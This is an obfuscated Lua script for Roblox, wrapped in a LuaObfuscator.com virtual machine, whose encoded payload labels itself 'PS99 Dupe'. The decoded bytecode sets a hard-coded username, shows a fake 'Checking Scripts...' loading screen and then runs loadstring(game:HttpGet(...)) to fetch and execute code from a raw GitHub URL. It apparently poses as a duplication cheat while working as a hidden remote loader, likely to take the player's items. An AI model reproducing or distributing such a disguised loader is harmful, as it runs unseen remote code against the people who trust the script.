--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 + 0)) then v84=(v31/((5 -3)^(v32-(1 -0))))%((1639 -(1523 + 114))^(((v33-(2 -1)) -(v32-((958 -(892 + 65)) + 0))) + (1 -(0 -0)))) ;return v84-(v84%(620 -(555 + 64))) ;end end else local v85=(2 + 0)^(v32-(1271 -(226 + 232 + 812))) ;return (((v31%(v85 + v85))>=v85) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v36 * (606 -(87 + 263))) + v35 ;end local function v23()local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(181 -(67 + (204 -91)))) then return (v41 * (8954692 + 3347585 + 4474939)) + (v40 * (160901 -95365)) + (v39 * (189 + 67)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (955 -((1799 -(915 + 82)) + 150)) );v18=v18 + 4 ;v37=(5 -3) -1 ;end end end local function v24()local v42=(0 -0) + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==3) then if (v47==0) then if (v46==(0 -0)) then return v48 * ((4215 -3028) -(1069 + 118)) ;else local v96=0 -0 ;while true do if (v96==(0 -0)) then v47=1;v45=0;break;end end end elseif (v47==(356 + 1691)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((20 -(10 + 8))^52))) ;end if (v42==((859 -(814 + 45)) -0)) then v43=v23();v44=v23();v42=443 -(416 + 26) ;end if (v42==(6 -4)) then v47=v20(v44,(24 -14) + 11 ,54 -(2 + 21) );v48=((v20(v44,470 -(145 + 293) )==(431 -(44 + 386))) and  -(1487 -(353 + 645 + 488))) or (1 + 0) ;v42=3 + 0 ;end if (v42==(773 -(201 + 571))) then v45=1;v46=(v20(v44,1139 -(116 + 1022) ,20) * ((8 -6)^(19 + 13))) + v43 ;v42=887 -(261 + 624) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1081 -(1020 + 60)) );v18=v18 + v49 ;local v51={};for v66=1424 -(630 + 793) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1559 -(120 + 1439) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(1 + 0)) then v55=nil;v56=nil;v52=1786 -(599 + 1185) ;end if (v52==(1322 -(1249 + 73))) then v53=0;v54=nil;v52=1;end if ((1 + 1)==v52) then v57=nil;v58=nil;v52=3 + 0 ;end if (v52==3) then v59=nil;while true do if (v53==0) then local v94=0 -0 ;while true do if ((5 -3)~=v94) then else v53=575 -(507 + 67) ;break;end if (v94~=(1900 -(106 + 1794))) then else v54={};v55={};v94=1 + 0 ;end if (v94==(1750 -(1013 + 736))) then v56={};v57={v54,v55,nil,v56};v94=5 -3 ;end end end if (v53~=(5 -3)) then else for v97=3 -2 ,v23() do local v98=584 -(57 + 527) ;local v99;local v100;local v101;while true do if (v98==(1427 -(41 + 1386))) then v99=867 -(550 + 317) ;v100=nil;v98=1 + 0 ;end if (v98==(1 -0)) then v101=nil;while true do if (v99~=(1 -0)) then else while true do if (v100==(0 -0)) then v101=v21();if (v20(v101,1,2 -1 )==(285 -(134 + 151))) then local v171=0 -0 ;local v172;local v173;local v174;while true do if (3~=v171) then else if (v20(v173,9 -6 ,1668 -(970 + 695) )==(1 -0)) then v174[7 -3 ]=v59[v174[1994 -(582 + 1408) ]];end v54[v97]=v174;break;end if (v171==(66 -(30 + 35))) then local v176=0 + 0 ;local v177;while true do if (v176==(0 -0)) then v177=0;while true do if ((3 -2)==v177) then v171=2 -0 ;break;end if (v177==(0 -0)) then local v183=0;while true do if (v183==(0 -0)) then v174={v22(),v22(),nil,nil};if (v172==(0 + 0)) then local v188=413 -(15 + 398) ;local v189;local v190;while true do if (v188==(0 + 0)) then v189=0 -0 ;v190=nil;v188=3 -2 ;end if (v188==(1 + 0)) then while true do if (v189~=(0 + 0)) then else v190=850 -(20 + 830) ;while true do if (v190~=(0 -0)) then else v174[129 -(116 + 10) ]=v22();v174[1 + 3 ]=v22();break;end end break;end end break;end end elseif (v172==(739 -(542 + 196))) then v174[1 + 2 ]=v23();elseif (v172==(1 + 1)) then v174[1639 -(1373 + 263) ]=v23() -((1002 -(451 + 549))^16) ;elseif (v172~=(1 + 2)) then else local v193=0 + 0 ;local v194;while true do if (v193==(0 + 0)) then v194=0 -0 ;while true do if (v194~=(0 -0)) then else v174[4 -1 ]=v23() -(2^(421 -(118 + 287))) ;v174[15 -11 ]=v22();break;end end break;end end end v183=1385 -(746 + 638) ;end if (1==v183) then v177=2 -1 ;break;end end end end break;end end end if (v171==(379 -(142 + 235))) then local v178=0 + 0 ;while true do if ((0 -0)==v178) then local v182=0 -0 ;while true do if (v182==(341 -(218 + 123))) then if (v20(v173,978 -(553 + 424) ,1)~=(1 -0)) then else v174[1583 -(1535 + 46) ]=v59[v174[2 + 0 ]];end if (v20(v173,2 + 0 ,2 + 0 )~=(1 + 0)) then else v174[563 -(306 + 254) ]=v59[v174[1 + 2 ]];end v182=1 -0 ;end if (v182==1) then v178=1;break;end end end if (v178==(1468 -(899 + 568))) then v171=2 + 1 ;break;end end end if (v171~=(0 + 0)) then else local v179=0 -0 ;while true do if (v179==(0 -0)) then v172=v20(v101,605 -(268 + 335) ,293 -(60 + 230) );v173=v20(v101,576 -(426 + 146) ,2 + 4 );v179=4 -3 ;end if (1==v179) then v171=1;break;end end end end end break;end end break;end if ((0 + 0)==v99) then local v151=1456 -(282 + 1174) ;while true do if (v151~=(812 -(569 + 242))) then else v99=1330 -(797 + 532) ;break;end if ((0 -0)==v151) then v100=0 + 0 ;v101=nil;v151=1025 -(706 + 318) ;end end end end break;end end end for v102=1,v23() do v55[v102-(1252 -(721 + 530)) ]=v28();end return v57;end if (1==v53) then local v95=0 -0 ;while true do if ((1272 -(945 + 326))==v95) then for v105=2 -1 ,v58 do local v106=0 + 0 ;local v107;local v108;local v109;while true do if (v106~=(701 -(271 + 429))) then else v109=nil;while true do if ((1 + 0)~=v107) then else if (v108==1) then v109=v21()~=(0 -0) ;elseif (v108==2) then v109=v24();elseif (v108~=(5 -2)) then else v109=v25();end v59[v105]=v109;break;end if (v107==(0 + 0)) then local v170=0 + 0 ;while true do if (v170==(1 -0)) then v107=1;break;end if (v170==(336 -(144 + 192))) then v108=v21();v109=nil;v170=1501 -(1408 + 92) ;end end end end break;end if (v106==(1086 -(461 + 625))) then v107=1288 -(993 + 295) ;v108=nil;v106=1 + 0 ;end end end v57[1174 -(418 + 753) ]=v21();v95=1 + 1 ;end if (v95==(1 + 1)) then v53=1 + 1 ;break;end if (v95==(0 + 0)) then v58=v23();v59={};v95=530 -(406 + 123) ;end end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v110=v80[2];local v111,v112=v71(v78[v110](v13(v78,v110 + 1 ,v80[3])));v73=(v112 + v110) -1 ;local v113=0;for v126=v110,v73 do v113=v113 + 1 ;v78[v126]=v111[v113];end else v78[v80[2]]=v80[3];end elseif (v81<=2) then do return;end elseif (v81>3) then do return;end else local v129=0;local v130;while true do if (v129==0) then v130=v80[2];v78[v130]=v78[v130](v13(v78,v130 + 1 ,v73));break;end end end elseif (v81<=6) then if (v81>5) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else v78[v80[2]]();end elseif (v81<=7) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>8) then v78[v80[2]]=v80[3]~=0 ;else local v135=v80[2];local v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v73=(v137 + v135) -1 ;local v138=0;for v152=v135,v73 do v138=v138 + 1 ;v78[v152]=v136[v138];end end elseif (v81<=14) then if (v81<=11) then if (v81>10) then local v117=0;local v118;local v119;while true do if (v117==1) then v78[v118 + 1 ]=v119;v78[v118]=v119[v80[4]];break;end if (v117==0) then v118=v80[2];v119=v78[v80[3]];v117=1;end end else v78[v80[2]]=v80[3];end elseif (v81<=12) then v78[v80[2]][v80[3]]=v80[4];elseif (v81==13) then v62[v80[3]]=v78[v80[2]];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=16) then if (v81==15) then v62[v80[3]]=v78[v80[2]];elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81<=17) then v78[v80[2]]();elseif (v81==18) then local v146=0;local v147;while true do if (v146==0) then v147=v80[2];v78[v147]=v78[v147](v13(v78,v147 + 1 ,v73));break;end end else local v148=0;local v149;local v150;while true do if (v148==1) then v78[v149 + 1 ]=v150;v78[v149]=v150[v80[4]];break;end if (v148==0) then v149=v80[2];v150=v78[v80[3]];v148=1;end end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!123O0003083O00557365726E616D65030E3O00426C61636B6D2O6F6E3130323339030D3O006C6F6164696E677363722O656E03023O005F4703103O00437573746F6D5363726970744E616D6503093O0050532O39204475706503053O00546578743103103O00536372697074204C6F616465643O2E03053O00546578743203123O0057616974696E6720666F722053637269707403053O00546578743303133O00436865636B696E6720536372697074733O2E03053O00546578743403133O005374617274696E6720536372697074733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473392E6C756100163O0012013O00023O00120D3O00014O00093O00013O00120D3O00033O0012103O00043O00300C3O000500060012103O00043O00300C3O000700080012103O00043O00300C3O0009000A0012103O00043O00300C3O000B000C0012103O00043O00300C3O000D000E0012103O000F3O001210000100103O002013000100010011001201000300124O0008000100034O00125O00022O00113O000100012O00043O00017O00",v9(),...);
